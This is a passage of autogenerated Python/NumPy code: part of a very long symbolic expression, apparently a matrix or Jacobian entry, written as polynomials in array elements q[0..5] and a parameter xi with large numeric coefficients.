0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), 0, 0, 0, 0, 0, 0, 0, 0, 0], [-99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (252839.506172839*(q[1, 0] - q[2, 0])**2*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 23972930.955647*(q[1, 0] - q[2, 0])**2*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + 2106.99588477366*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 25656313330.5455*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 811781788.97429*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 15981953.9704313*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 168559.670781893*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 711.111111111111*numpy.sqrt(3)*(q[1, 0] - q[2, 0])), -160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1053.49794238683*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4.44444444444444*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) - 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-76968939991.6364*q[1, 0] + 76968939991.6364*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + (-47945861.911294*q[1, 0] + 47945861.911294*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 252839.506172839*(q[1, 0] - q[2, 0])**2*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + (505679.012345679*q[1, 0] - 505679.012345679*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (2435345366.92287*q[1, 0] - 2435345366.92287*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 2133.33333333333*q[1, 0] + 2133.33333333333*q[2, 0]), -160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] - 4*q[1, 0] + 8*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] - 3*q[1, 0] + 6*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] - 2*q[1, 0] + 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(-q[0, 0] - q[1, 0] + 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 